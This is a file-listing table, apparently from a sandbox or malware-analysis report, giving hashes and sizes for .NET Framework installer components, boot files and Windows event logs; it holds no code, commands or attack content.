\588bce7c90097ed212\RGB9RAST_x64.msi	180.76 KB	MD5: 122c63fe88340291cc7594615a43e3e1 SHA1: 7c661aca63fee8ff0d0349b520f8bf5201a0a291 SHA256: 4cebfcabb82016760c67939dde29ab8b1182362528cd4db7665e4eadfd858b4a SSDeep: 3072:6C0eLllee1CZa8dJNpmVM6+5hr/guJ/Zl5vGEtp1RjZDedzU1IsQ+kfGgoCQa9uY:6L2Le4RoJPmq6+XgS/ZlphSlUHQ+eSCb	... File Actions Show Properties Download
\588bce7c90097ed212\ParameterInfo.xml	265.93 KB	MD5: 6472bbfb50b315f214b0676b0a810735 SHA1: 1370691e20f2492ca862a26cb3739a979f071ade SHA256: 0507d18092502946bf93d52a0b7781c3f3ffd4d7fd425072506b6dcc0fdae76f SSDeep: 6144:MuoVcUIGXUyi6WM3TIbGT9hqfqQw3bGIXkRr/8iitNxRV6ch:MuodJ26WM3VEqQwrr0L8iENxb9	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Extended_x86.msi	484.26 KB	MD5: 7377cc627c8feead72dc0a0a5cf1118e SHA1: c6c72d364df3d175c0babee0ded7eee50b34d912 SHA256: f50c17993a23523a4b7e425f2364d2cb057f5e042b10903661db75de35a24ee8 SSDeep: 12288:+wttn3UWnKbkf8TQMgJV47ReAZPFdnGg50c19Z3Ao1o+Oa3R:Ftx3UWKbkf88MgJV4BDcgyOQgO0	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Extended_x64.msi	852.26 KB	MD5: e97fde10312251f844f76bd4af962217 SHA1: a10296397cbce401e2160e89a72c92ef5ce4dfe8 SHA256: c62a93dc3895af0fee24c1dab29aae43dd34a98a12b81d06611e50eaa10f1c35 SSDeep: 24576:J7CQxqLXVytzO/Eq0nmcHN9sVV3k0U8I+jKjpmOUA:FZxcGzOsq0mcHNE55I9jdx	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Extended.mzz	41.13 MB	MD5: 680bd1bf3bc4adf40182ad1a42d2248d SHA1: 12cc1933af109b51961d35e221e3b96db4b48bd4 SHA256: e0a758756955a844a816015962c9867d4aa584d39bd2bca9d783f038428ac88c SSDeep: 196608:pqEv5vUMWhOOcc3Sr1GCcjpWjUCFKz3HS5O0qzVnKcNhy4zr6ShDYSmVDTKqZxp:o936v6GXF6XS/cv/7hMSmJTx/	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Core_x86.msi	1.11 MB	MD5: c277860afb390c5310a34c4105053402 SHA1: 420dd0088304fad88e241c543774227d35b8ab7b SHA256: 617beda243f5dd6a6cc9f82ece035d95a470de5cfc388f8679b8346b234ebbf1 SSDeep: 24576:JJMipR7Dh75N5lBHfMVhL3f7cpl4/oBDWOQZNnRX8Q8FswriyDUeUEA6SlzZ3O:Jiizh7hlB/QLv7SB6OMX8iwrxYeNAXlw	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Core_x64.msi	1.81 MB	MD5: b0b8b820c7c6f0fffafb44a528ccd3ff SHA1: e24f3f4cdb997efed2207458559a5df96c9500bf SHA256: bbac44ee6d252ebd422adc1e8ef3daa3c70b8d52a8c871d4d4544823080451f9 SSDeep: 49152:dpA2KNJNV1PFSLswOZfKR2b20ZBP5fv6vCy5FNQRdRd:dpA2O5hqOxKR2CCBSTNa3d	... File Actions Show Properties Download
\588bce7c90097ed212\netfx_Core.mzz	173.08 MB	MD5: 86532abba7e19507ba1305c0647206e0 SHA1: ad22a069483dbdae2105b126a25c5ac64404a9e8 SHA256: e12e8b0c6391ed5116eacb201660aa1cb9332c1a175a485603985fd469aca8f1 SSDeep: 196608:pF64iqE0Z3dIkWdCBNe1wv5nLbBmu+HiAxXQzD4Xe47BUWVxgjoX5qph1kGbBeuk:pFxivsdIkWdCBNe1ibkuAxxXaIB7wa5F	... File Actions Show Properties Download
\588bce7c90097ed212\header.bmp	3.80 KB	MD5: 0bb5abd36704b308696d5ca77844eaad SHA1: 45970982c31a9752d8cf1d6175881c5fb1c1f0fd SHA256: 2dab228f8431816a8fbcfc180ae128fe9ead200de7d6b112d5dbf986b0deabe5 SSDeep: 96:BnGSXvEOYcVXYvuiOCdcFcfNKu7nWe4nOUt:Bnt0cVXKihFCf7We4lt	... File Actions Show Properties Download
\588bce7c90097ed212\DisplayIcon.ico	86.72 KB	MD5: a5fd6d2601842e97b941db656b37cf4d SHA1: 579cdb33716d2f3cd13f94cd11b93ca409d46ff2 SHA256: 1e63ec4a0987fcc3e4ad8690dce43e3b53a5ef4650d42fb9862f934139026372 SSDeep: 1536:tbhW0r5MxfDlXgKd8IVBI2bM+yW6JpXVuvnmb2vYZQZYeiOrG0ywb5RlRp/7DwXd:i0r5MxLlkIM2b/6D0npvkeiO6wRrj0TJ	... File Actions Show Properties Download
\Boot\BOOTSTAT.DAT	64.26 KB	MD5: 9e473ff1f1335191357bec0ffbde9453 SHA1: 55307ebcbc71118d48fde009f512d1150a140e96 SHA256: 1628aa701b44de38d3e970bc8e20b97a4905ce2c3da9a5abbde520d8c2905bc1 SSDeep: 1536:rPZOxd+qqP+1RwDGk3eH84Ji5Zo+fAfsEluW08mExuYVD1SCJBJ:zZOT8+1mX3eH84Ji5+aApR08mId9YCV	... File Actions Show Properties Download
\Boot\BCD.LOG2	264 bytes	MD5: 85f4f7ac8edfcfbbe4afa95e4cbb55ea SHA1: d922c3d219ae6ecf617c77385c055933ccaecd3d SHA256: 525e8b01e456bdd73f6465a3e7d40b0e5ae0f89377739477080c6bf5d1cc4a7f SSDeep: 6:WiTXSK3E/i95AQl5JG0fMr0+mTPLs0XMLl5PHOvf3l:WEvsyBXMwpDYrLl5PgN	... File Actions Show Properties Download
\Boot\BCD.LOG1	264 bytes	MD5: d2a5e8aedc792345fb35ed8e176bff4b SHA1: 019966111e85d89789b06d94fba3c0c1fe35aa1d SHA256: 00b7f8061cf3f7a78e7bdc1fe6175f527ab823e013801c13bf39680d02adf4df SSDeep: 6:cYdSGopz22MXpKkSMRVl/ShJd21QvSwIkxYmt4sbMU62nzDB:sG0NgSaAt21bwISvVdnz9	... File Actions Show Properties Download
\Logs\Windows PowerShell.evtx	68.26 KB	MD5: 8eac6f88446eeb216084786ae7344ac5 SHA1: 1c79dd873dc33d44bc0d20f618bcc73235d2a538 SHA256: d2fe7a5d890f9de96c5aa91bdb29cd16a041ffe7659410269a87dd7e90bad464 SSDeep: 1536:p2FjVPWvSQ0qyz8tpkOtGMU+94nNyzkrcs9iCSBHpkvMUzgWIUr:ojVJTq9tpxtBUznNyzkrcswpkEUhV	... File Actions Show Properties Download
\Logs\System.evtx	1.07 MB	MD5: e29afe5e2f3e054d36eaa3a0173452a1 SHA1: 6b9fb11f24a5a578b7841350703d449ffdd312ce SHA256: 9b5cce072d0d24dcd4a6e7c12c36b60a5263f5944b7cd8ab2e6e673b3b6ba7bb SSDeep: 24576:NP+VmtIEPp+Z4BOJlOfLXBWcaMmuErvFqX4BxKm1Q+SR+ndmOUSLX0kU9:NPbtFgZ4BOPoXBWBMmRrFqX4FQf+mOUl	... File Actions Show Properties Download
\Logs\Setup.evtx	68.26 KB	MD5: 8632321a3155867331097ad0c535fc8a SHA1: c9728d0d20673ef8a56ec82b8023359c669af028 SHA256: c75ddaf2f89fcff0b16b95664826c10c549709a764714c1d7e6ee5cb7386aa99 SSDeep: 1536:eJo5EXBXR+995LORyf8c5EmOa1ZFPoKdfC1PujlDl:moIBXENLCm8c5EmT1ZjfRjlDl	... File Actions Show Properties Download
\Logs\Security.evtx	1.07 MB	MD5: 2213c4e59bcc717bbca574689fc396ad SHA1: f5cb1e320ae94c699ee271aaca3e8784d3a26235 SHA256: 7e9aa551169e65b310214b0562bc71f0be62d8c0d1241f7497526e76d3ab6ab4 SSDeep: 24576:o6MFafLNhM/7tmJ72OVUPeOWhPnI3YR43hj1J:o6MFcNhg7DOVUPeOWhPIYiJ	... File Actions Show Properties Download
\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx	1.00 MB	MD5: 0d17009575119a1e541f5fd15743fee6 SHA1: 490854184586b3702e3ad45a00735329a277c14f SHA256: 4c319b67239c7b9e327ed2bd2c865585c71067241d00e10911f035a7b22f7149 SSDeep: 24576:JWGEcJrKHOPYglf4TwE2j2shFdXNFUf+2Mtp/Z1bG:WcJKHQYgKTRAFdTUf+28Z4	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Winlogon%4Operational.evtx	68.26 KB	MD5: a34ec4ec03121b549d1a1ff705900a5e SHA1: 43726bb283fb21352181850e3103437f419e0af4 SHA256: ac57aa6e2ab9d013576cb48ac2288f397700c9cc8d268c4d3ad61e85f80ab449 SSDeep: 1536:cMgy9LDHb3WPUh9gpuNcTuyGXn70uSM9i0x3mtWSX231E:c/4Wk91c7UQ7M9i0Jmt3Xwa	... File Actions Show Properties Download
\Logs\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx	68.26 KB	MD5: b6f68b3eb94e9c92d76b765ac4e60159 SHA1: 928f5448cfaa50810801e1d9d9c070a0f5a329b7 SHA256: 5e4a5a0f56c527434d6e5d30b4c14fc0b10389dd2a1c1039c16ce79afbc2342a SSDeep: 1536:jiZpJ7lfK04UUoHYhO/mUEFyOLWCAXvfTsIRAUKWW3nOYCay:4rZz4UveTBLtA/gIRAU7wZy	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx	1.00 MB	MD5: e84ff8ae39c26dd2c26201fdf0744754 SHA1: db5a17fd5e8d850bb0298e96c4e39f8b0c7d1891 SHA256: 5247dde4f15c0a6ba676bd615657fc69e9e5cd93fe9a9432d5c104bc88c51c71 SSDeep: 24576:Q8eBWilPw5Uc9EF2kxxZAriO6q0aPN+oUq2jOqgYh:Q8eBWiKWc9e3AUq3PN+lqKFN	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx	68.26 KB	MD5: 7968eef02211599f417431d81a89886b SHA1: a1547d5b2bc848c32468c8f137696f8f13ca7d6d SHA256: 997960f2de9182fbeb9828931ed56e691a754462a2eab6dedb884dd52246c6b0 SSDeep: 1536:AvlJcLM0SppiJxNkrbT+p2us904jLLwn9CITB7nvj:VqppUNk7+pUWafwnxRnvj	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx	68.26 KB	MD5: 67dc1129535848ce5da1b05b436f3d6a SHA1: 55a52f92b459ddac248e34b568f710e752b616a1 SHA256: 2c14ef462d91be8a233c22aabbcbed007d7bcc9525ea3719addd443acb47cad0 SSDeep: 1536:tlUh7rrBziX/yzIF4+3OmDAIbH9EJMpbR4jcJfKcdnS:6sPy0X3OQJbdEJMlGcJicdS	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx	68.26 KB	MD5: 25eb7bc4c94c6759d05336c99004d3fa SHA1: 18b9d1b4a8b6d563540c9d20b290f5b10319c2ad SHA256: 131d7618b025f0a8fc0230e77b479f045d10e6a24a1a6c2091e46a7e9226b7e3 SSDeep: 1536:EG1Edr7rP/hJ9i3BSkcEqS1vJ1l3YlblFkJacOmbAii:p12H/hJ97kPvJH3YVlpcOmhi	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx	68.26 KB	MD5: a81b8c8983724eaf9860f8fc57731389 SHA1: a31699284da6583df2b97a8d9dcfc28cdb4c83c5 SHA256: 1afc9fa71e41e7238425ea072539ba00021ba74bfd06e471c4dbbec69a49c1d3 SSDeep: 1536:9ymEcPWwoy0Iss2zYDD5OqdbPztfuYVKX6q/J:50Iss+YROabLtGYVpqR	... File Actions Show Properties Download
\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx	68.26 KB	MD5: a3ed40993bf0bc75129dcbd88c53d122 SHA1: 20599eb52f8482f4bbdf1f1d67c57d00fc5e899b SHA256: c6072b3594156a2400e5239d8203b9f2ff3bcd97380d1a33b4655d02c9f5e9e3 SSDeep: 1536:UKlJ67hO5xZzf5ZDsAfr/CNWXyJKj3U4wpWf0m5:xJKh2RZDPAWX+2kfWsO	... File Actions Show Properties Download
\Logs\Microsoft-Windows-UserPnp%4DeviceInstall.evtx	68.26 KB	MD5: 5e666dcee61adcd461374dc0ff1ba1ee SHA1: 8ceeccf532e8f96428ca4a78c1ec1f498e07dae0 SHA256: 33ee7c11b3b499283351597da226e46bd2799d60fd37c904811c1186aca66cd8 SSDeep: 1536:FsXcTC8uJ9hoplrE+5/0Qmj6Cx6OcPQNHfXCsRO8lQl93svM4Pq7:FSN8g9mTl/qjx6OrNPCj8lfMP	... File Actions Show Properties Download
\Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx	68.26 KB	MD5: 4a1a63ec67e9dae27db6c16cce4dcc71 SHA1: bc097864393843068346d5b1fb215014f8a3a227 SHA256: d88e72d8aaa34e6f3a88db37fbaa319fee248717afc852273aacb2e022261bbe SSDeep: 1536:eBYqlc6iPL9OcCDM6TzeoCvPIPaG0n+G2+A7GJ1Fal:aYCPiDAcWM6TK5QiG0+GoI1FG	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TWinUI%4Operational.evtx	68.26 KB	MD5: 72b610844058c7f6215fe02f9f9ac86a SHA1: 934c150e1a1d9d827ef3e3017c915d8d4736f5c1 SHA256: 3b90fa1e857ebaf0cae82ca38e29cbfa8096dcb7f5fe9d32dc8016f01a06549c SSDeep: 1536:fo1UtAeGziDI+mN0gFjOTyEcmfsxwzkyg5wQxBMLU+zDwFpxWEDZIKkE:A1spGOONHfo0xwzXg5wQx+LjEFpYQt3	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx	68.26 KB	MD5: 63d4453d55dda40e30c6b387b52680d2 SHA1: 5ebb98d7e6410d54329d5cc22e19521d8181a190 SHA256: 4a4d1702df1440d5c5bee9cfd89a5676598916fa564eb3de81226a437e3ae9d2 SSDeep: 1536:xk5BEGTawn+h7lUeqVbt7ZBRmN8uOoAogj+wb:x22GJu7lbqVBZBR48LoAog+wb	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx	68.26 KB	MD5: b2020462c9ca87d7b38ac9e07f15e94c SHA1: 34e9298af68586feb28a92b53f0e492ff967aabb SHA256: 7d476451d808bd5c96e33ef708830a954ac6c27a1134b09946530215dacdb9dc SSDeep: 1536:6ufqUL5Q42fVifzEyYhhGIRMPihWEJ4uuF3paS6vu2mEvhdAldi2j:/fqgQnifzEyYhhHMt64DUuSvhu/j	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx	68.26 KB	MD5: 002c8fd1e5938c397e594d62e1696941 SHA1: e183335c0f9523f9ea6f4928bb179af69474eeeb SHA256: 73a9cc2f2fdcbc40f48899d1b4da61c16c31a9677f3e5f3186f9b5c3ec47d696 SSDeep: 1536:HDrvd+Oa5gA2XMSLhs1r2hLLZvkQQp0NUnh/2amK4zO7hIWoE70FkFQpwT:HfduB2JL+GhArnhvmK4SOWySnT	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx	68.26 KB	MD5: 7a31949dafb2b1fb7c947650872cdf84 SHA1: c35f19b2b1ddcb3744eb5010115bf56e11cdfa5f SHA256: ac6e0d2ff8d46a20ff5002a2f7c5528e2be5146fa5008b459e3737e98b8efc59 SSDeep: 1536:8CGw1TGV+Omef3evwAvsQU7HP+y5lPMDk4g3KlLs6ttg543A96E:/GaTGnf3euQ0my5lkg4g3KlLs4tOJX	... File Actions Show Properties Download
\Logs\Microsoft-Windows-TaskScheduler%4Maintenance.evtx	68.26 KB	MD5: 759b07e399286ca5c42eec7583984d91 SHA1: c873deab3cacba91b56270e9b9c00a3526853bde SHA256: e5437c2cfb942423a07c6485e23c7d40c1085380f05405f3cdc96c0bf07c4183 SSDeep: 1536:5VC0D0KgyUs8kvg/Okbwgt8CMSgipjYmaNnXZHgqHEwKfCca5Q6m5gY:500DTgrnaWOkbwg1eiBYBZHg63cX6MB	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Store%4Operational.evtx	68.26 KB	MD5: c4ce463bdbcf54ecd9855538cfb3d4c0 SHA1: e50ad5c52504f28d06eb4d9ecea076c1b9d23df2 SHA256: fe4667dc37bef0e7b8950c267ca98933ab1d345bd42ad97a1bb9586a7a3914ec SSDeep: 1536:d2I1LJLpMLVaQtp8xQ4D1KSb5t6lteNVmk5ZwaLq/E:dTJanp8xXBKO5t6Le7RB	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SMBServer%4Security.evtx	68.26 KB	MD5: 8c10ef7d525289f1727930da31d18087 SHA1: 3336137e277d60dfab65d75700b1e05af08c7f3a SHA256: f8f4dce13f101b3dbd4c6795815d1a776ff3aff71bf814b2638967adc149017f SSDeep: 1536:Sf6jIYUEHenkLqXgESqwsrYP/E0Ffr3JKQcgqdLz7vQND8FnjAAA:hbU8enkev14PVjJKnhzN8	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SMBServer%4Connectivity.evtx	68.26 KB	MD5: 4ed343a2a1a666e827269f53e375071d SHA1: ed0ff54272c0b76ce50c8dcf9772322ca6fc3bd0 SHA256: 818a4122b81695447711bbf5500aeea72937a58001401f0c95cd9dfdde2ec659 SSDeep: 1536:MWrVmbJtdugV4HqoS+Ve0qg5wRE+M49lMQocjmFX7llreayiT:MWrVyJ3VEqoxVR5wRE+qqmFLvrea9	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SMBServer%4Audit.evtx	68.26 KB	MD5: 13597df1eede847abe4755e738c54612 SHA1: 471e13bf7b1e0d7ba718d3c3260d55deec5ce75f SHA256: ae317d2b826f50f54b4136bddae4b708b0a14af3c34c30a5e475e580ea6221c5 SSDeep: 1536:twl8tJpuMlsQwTl6ZFFxY+gKp4BjGOYwn1ISW6z:twl8tJsM+Qr0SLFwneSnz	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SmbClient%4Security.evtx	68.26 KB	MD5: b5f59e589f84b09b1e0b9f017171c240 SHA1: be12d8ff76953cec0bf142068d0d4432cb07fe1a SHA256: f2c6c9a606c8919a8abfeed87fa8a33e0c510e4f34267590236593430bd28aa4 SSDeep: 1536:xkVFmK0WPHgBscCTrU67NsNASxXtqXfkgRROBNz2/onrNeOyuPMCuLiOlf/:xkDxOhKU6qGSptUkZBNqCgD7LBt/	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SMBClient%4Operational.evtx	68.26 KB	MD5: 0d52f4615baba7acc4b9f8f5cc17323c SHA1: 02b0ec7e208fda54a07a21c623fbab962fe60aef SHA256: d39bfe5bcda9e256b0f14d840dde801f1780b6cfd902d4177c15a1c991ee22c2 SSDeep: 1536:bARd9ICrnqPSu8ZIS3IQ9T0lXjPoEL1xMurGlHNw1zZjXMwOf:sr+Gq09T0lXj51xZWIZz9W	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx	68.26 KB	MD5: 8318fb1b6b665cbb2b826b2ba3eb5bed SHA1: 23c2302b2c883635a7173d974763cd91451adcd8 SHA256: 0a45479fe4e3ffc059da47ffd4ec3449a504f0c81c39edc5c1049045dc3a326e SSDeep: 1536:WRZN0XKR/4f0mXNcFAdh60Oi6ZznloeA2e4E06yuU:WN0a6f0mX2Av61qe3e47nj	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Shell-Core%4Operational.evtx	68.26 KB	MD5: 6e991368627ce81b248b7d5da947c77e SHA1: c2e643016ca7b7e16be14bc3ec41319b11fa7a31 SHA256: 3b1e4631c46ba1844ca9578b9e0a9a0866f77bd489e4cbc0db8eda46a09f3f5e SSDeep: 1536:+1xBu0oY6xsYOQbyb8Tve9ozSdrLqoET7n5zN:SBnl6xsY7vN2ErzN	... File Actions Show Properties Download
\Logs\Microsoft-Windows-SettingSync%4Debug.evtx	1.00 MB	MD5: 0735acb5e8f9aa9efef18bafd9762017 SHA1: 91f57d3ae856f9ef025e06271f967ee92b7cf0d3 SHA256: 5548a24ac03d62df1c53f3d5e3fcbf0f97d9e2391e7b20a6349ab2b25587286d SSDeep: 24576:oRVprCm/Ot5TpDvXXnp1FVrTL92DZre+uin8PgRoTsjyc:OVCmqRHnpVTLkDswtasX	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Resource-Exhaustion-Detector%4Operational.evtx	68.26 KB	MD5: e882a8b467a4179e72b1375f932b163a SHA1: 6d2280e5b0bb742c7b6729a5c57a09ca1e7e889f SHA256: d5a607fb19ea7eaacb09681403177cbc4cd457148aac0a110938979e73f07704 SSDeep: 1536:/An5OSGdtspZCuNpbCIWUkf4LfYToBT5Ww8xLSV0JYhUuNWDJrWMAoeyLICx/M:I5OSG4ZPNtzWFfYYToBIPx+qoRNWDJrc	... File Actions Show Properties Download
\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx	68.26 KB	MD5: 1067076ebeb5661575d359c1d5bb5b5d SHA1: 560a4e7077e762b40a8ff020ebe74735f27b228b SHA256: 4f4af6d32d11eda67142ea530b1bdaffcbeeadebb10e599f6d0ba6292d8500cc SSDeep: 1536:EvUA4/012J0XbLYmxZBWzhFVrB55l3GVMvFhXijPOzJlTurruvz7:Evnf11Qy6zhfrtMVmDiOWru77	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	68.26 KB	MD5: 603aafb155aa8f7005198fa31d1f8746 SHA1: dc98ae9cc217f2a4c5d69cd0bdcf66a357f7d78b SHA256: bca39123f65fc6b8614e3f0a4b9e30df076ce843138354c541dee7d9c9ee308d SSDeep: 1536:gVy6gdPs/w5b/S0/ROrOptUBoDk4Pec+R87nkjHyweGYQ0hvteU8o3:gc6gdPs/wPhtUODV77nkOweGl0feU8w	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Ntfs%4Operational.evtx	68.26 KB	MD5: b8cbff666b45572402341cd551079526 SHA1: 8a0777a7e69b271a53901a51a190163821527e45 SHA256: 77631608fe74dfc50e5f0d71acb299ede486e2fb28eda18f93b8435753119d8b SSDeep: 1536:GCdE7EC/BZYXbulZTEhTa2AS/DuYuhQjasGXP2Kt+YZp9szA+ysv:PC/BRwhTagDuYzaf2O+mszA+R	... File Actions Show Properties Download
\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx	68.26 KB	MD5: fa7ecf46c9f5e5c27b2685b949b8ce6a SHA1: 634b9ce5c7cefa0f4430f772d239d24a6678284e SHA256: 75ff41893338357041ab1c2eebb16ef6f766a26f10620820e1197ea78ade5f1d SSDeep: 1536:ZPJLRrgtG/0Gg8Qoc6hIs+eMW+fuzqvudF1uWMXEXJmOTzE0O:BJdMS3QoIs+eMWv481Y6EOnE0O	... File Actions Show Properties Download
\Logs\Microsoft-Windows-NCSI%4Operational.evtx	68.26 KB	MD5: 9b6b93b1e2980dcda9506fbd109cbbf1 SHA1: 2787d6e35fa1b44d7876f833e9ac266b7de785a2 SHA256: d793e16b4664d15118e8dcc96303c4604ed1d0e8bb2e492dcd045ae1dd40711f SSDeep: 1536:oN+DtMBaVpOiwRI/m1blBiNYJaxHxhoJxSEtbgBBJrIA431:oQJMLI/m1bl9MxHxhAxrgJrCl	... File Actions Show Properties Download
\Logs\Microsoft-Windows-MUI%4Operational.evtx	68.26 KB	MD5: 4b8e3f6a118944802d0e628b0db3233a SHA1: c0ea4955904c786cd174e1303aaf95d140ea60f5 SHA256: 25f856d4b4c7e9ebda2d69e032f959b3a86a42d9b6ecec4eeceea780939249af SSDeep: 1536:aPUL1Li0p+G2G3ORJcWMbmani4FvpggepuKVjH:at0pRCxDMi4D9eDd	... File Actions Show Properties Download
\Logs\Microsoft-Windows-LiveId%4Operational.evtx	68.26 KB	MD5: e2822294d49557526fb3e8dce9d190cd SHA1: 78a8b626624a0e578b69dab695422dc83d746234 SHA256: fbc31b1d1296d7847cab4a940684e20e240e6bb821506af46108da2f47cae3ec SSDeep: 1536:lp4YDKBxq9FCj5pkFd25mMZoHVLwZIvEw8JpnjRqXbGOWh7sNuKJwBF:z4GTqsEssIvYJpncwRKJc	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Known Folders API Service.evtx	68.26 KB	MD5: d425fbc7652cf7af6db92b4858ace0a0 SHA1: 2034daa94414ceca9ba90eb963e65c2427704373 SHA256: 2d78c4b14aa1e8e05f6c54fe2f11e2a8e1f5dff1ae7e5f168f89e9724642ac89 SSDeep: 1536:pupJGpwNPkU4EXMTDnuIkZjDQahI/B3LozDT122:sjBZ4mlQNboXTb	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx	68.26 KB	MD5: 4494e7d420b0550bbcb2d24111e7b01b SHA1: a6c2afa23ea2b21558c302ba8487b1822286c0e8 SHA256: 0f8999aeebfa9fd9012d0de47070c30f12b8e9bdf4cb4d5176aba6b2da0388c7 SSDeep: 1536:D5/nsHcMCeapUl7OsXYB2yWNpiSTwYe+vY:D5EcMZUC7jH3i1wY	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-WHEA%4Errors.evtx	68.26 KB	MD5: 4d8a7975a560bbfda51a9c4d5961581f SHA1: 7c6fc29ea6cfaaddff2cefdd151442d56f97f5a2 SHA256: 4006c53c6c0ea8c74a916deba00f8e42287bda982fd12c2b4e95f05460cfc5c4 SSDeep: 1536:HJ7/ZFtTl8aFRvzvtZihUwcrL3DIPFwQLAlEn84Db/r3Zxh3:Z38W1zv7ikrrDIPuQ8mvH/rbt	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-StoreMgr%4Operational.evtx	68.26 KB	MD5: d03e2a71b602788b173c7a13840f89b9 SHA1: ba0cc92a2665b4524afea36117285d11ff4ec236 SHA256: c64aba0598168be4e23bd5a1ba8ccbe2d979e0235bd49f76bb5b321ea6a0bd6f SSDeep: 1536:085tKZkDV4j+WbQt6njmnCWbIclW7EDdf+w4Cm8sx:F/KZk4jZk6naIcY7Q74CM	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx	68.26 KB	MD5: 0568034d1ca22fd5879c74d0de0d7574 SHA1: 132a553724232f173597cd393c4637fbb0f19d9e SHA256: 6e8266f2d49921ae46c41ef7fa1caa1d3e2fb5d7297dbe55f330d85586ec97a4 SSDeep: 1536:Xl6qtE67UOTL4DrceFlID+lI+6sMY7meBwUPcOdx/2Q0okaPSm:VrpYfPccIav6lBeBPFdx/2jL9m	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx	68.26 KB	MD5: 4bfb94c7e480f41ebd6fca91475c02fb SHA1: e8c727935a2d7c6a0a42f08d4360058d7a24b8c5 SHA256: b88dc10a08e0f3df4443b68ec0b2eabf42459a065de2064387b85c2df16b1cc0 SSDeep: 1536:sEWXnDTXEYRS+8VOjOWKYg7R1nf+s4ekVhdNsBY0j7sAAFBj82ELkV4:bYAYR7gT+s4ekTejjI/8Le4	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-PnP%4Configuration.evtx	1.00 MB	MD5: 2462868ddd5404886c700f11813fc42e SHA1: 9adab7c68646ce9ff12691238fa07fd518d9eeb7 SHA256: 7081af79f61be74e35c2eae0879739093d75a4af8a0eaa495f27c1ffc6c2b001 SSDeep: 24576:5qujSQOgIMKDhBjE22eTedebSiNCjZAzCj89us:5vOgat1EOSisJjTs	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx	68.26 KB	MD5: f9c452408abe6b13e7850a47896ae611 SHA1: 6a61a9c18a8d663eb1067719d1c4d521fb435a9d SHA256: 9f06028946da08a5916f44e6949bb317939d2d7848a6113615f12b387b2f8e39 SSDeep: 1536:BLXIUwe4VCLggMbtBv8yyJJ81Aenl6LDaP9QpRlSa3O34:BXITe4VCLgF8yvjlhP6lSIO34	... File Actions Show Properties Download
\Logs\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx	68.26 KB	MD5: f11c5c4074bd6e971c6c86167073c000 SHA1: ae4b7a2ecc56fa4fa2e3842dd025bcc9c4f04142 SHA256: b15e3e2e2b457582eb48a03bf693b2e7c1e4c6a35b33dea30993b1773549c602 SSDeep: 1536:beFZFe5pUVdrXwjZ1wLnlRf79oQI2gLlcY7fSfXmKmkJJx9:bGe5pUTXwd1+l17uLaQfW2dkJJL	... File Actions Show Properties Download
\Logs\Microsoft-Windows-HotspotAuth%4Operational.evtx	68.26 KB	MD5: b94e5f47c807a83b77b83f1829acc6fe SHA1: 2cbf9086e683e53d4a767a18eea4aab8da733282 SHA256: ffce8abed2a41e2a973abd57f9c3e7a611ffd1f908d62a0c5b0b9f01d062af34 SSDeep: 1536:w5+fUX4+5EHvKVKLG2KVv4Bni7RbZH2cab+6cLpehcgU4iUg53be8p+JGs:w5+fUX9uIKC91SU8Bb+6cd3D4iUQbe8U	... File Actions Show Properties Download
\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx	68.26 KB	MD5: 7de5ede53b5c72e2a09ee7162dc9efc7 SHA1: d26c82e0c5aedb23c3103f1d534f8364cf49416a SHA256: 55984562d9ce904649e246548ae61274cbb5bce64c384af7cff301405f89779d SSDeep: 1536:9ZuqutTXxj2Jzwy7jnAP6OZoljCUt+e9XBbh9dmhqQ3FQbojD3984:yltTkXAPiCUt+e99Yhfiu7a4	... File Actions Show Properties Download
